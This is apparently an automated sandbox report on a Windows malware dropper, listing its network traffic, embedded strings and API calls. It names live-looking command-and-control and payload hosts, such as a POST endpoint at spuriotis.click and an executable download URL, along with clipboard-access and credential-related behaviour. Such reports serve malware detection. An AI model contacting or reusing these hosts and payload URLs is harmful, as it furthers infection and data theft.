                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0056D889 InternetReadFile,SetEvent,GetLastError,SetEvent,14_2_0056D889
                Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                Source: global trafficHTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: */*
                Source: global trafficDNS traffic detected: DNS query: httpbin.org
                Source: global trafficDNS traffic detected: DNS query: yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn
                Source: global trafficDNS traffic detected: DNS query: home.fortth14ht.top
                Source: global trafficDNS traffic detected: DNS query: spuriotis.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 28 Dec 2024 08:29:52 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 28 Dec 2024 08:29:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: http://.css
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: http://.jpg
                Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                Source: Set-up.exe.0.drString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13
                Source: Set-up.exe, 00000003.00000002.2498542367.0000000000B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
                Source: Set-up.exe, Set-up.exe, 00000003.00000003.2496527843.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496126173.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496722730.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2497124911.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2495746177.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2498542367.0000000000B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0
                Source: Set-up.exe, 00000003.00000003.2496527843.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496126173.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496722730.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2497124911.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2495746177.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2498542367.0000000000B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=06
                Source: Set-up.exe, 00000003.00000002.2499326538.0000000001129000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS
                Source: Set-up.exe, 00000003.00000003.2496527843.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496126173.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496722730.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2497124911.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2495746177.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2498542367.0000000000B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse=I
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: http://html4/loose.dtd
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000002.00000000.2217096288.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
                Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000077B9000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.drString found in binary or memory: http://timestamp.digicert.com0
                Source: Climb.com, 0000000E.00000000.2308290688.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp, Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: Set-up.exe.0.drString found in binary or memory: https://curl.se/docs/alt-svc.html
                Source: Set-up.exe.0.drString found in binary or memory: https://curl.se/docs/hsts.html
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: https://curl.se/docs/http-cookies.html
                Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: https://httpbin.org/ip
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: https://httpbin.org/ipbefore
                Source: Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://razaseoexpertinbd.com/Assaac.exe
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
                Source: Climb.com, 0000000E.00000002.3470088384.0000000001A5D000.00000004.00000020.00020000.00000000.sdmp, Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.3296131318.000000000457B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.3296354162.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.3296328079.000000000457B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/
                Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000002.3470289773.0000000001B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/api
                Source: Climb.com, 0000000E.00000002.3470289773.0000000001B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/apiK
                Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/piVL
                Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/uo
                Source: Climb.com, 0000000E.00000002.3470088384.0000000001A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click/xD
                Source: Climb.com, 0000000E.00000002.3470289773.0000000001B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click:443/api
                Source: Climb.com, 0000000E.00000002.3470289773.0000000001B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spuriotis.click:443/apil
                Source: Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Fingers.11.dr, PasoCattle.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49781 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49787 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49794 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49800 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49810 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49818 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49830 version: TLS 1.2
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0056F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,14_2_0056F7C7
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0056F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,14_2_0056F55C
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00589FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,14_2_00589FD2

                System Summary

                barindex
                Source: 0.2.CLaYpUL3zw.exe.5d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
                Source: CLaYpUL3zw.exeStatic PE information: section name:
                Source: CLaYpUL3zw.exeStatic PE information: section name: .idata
                Source: CLaYpUL3zw.exeStatic PE information: section name:
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00564763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,14_2_00564763
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00551B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,14_2_00551B4D
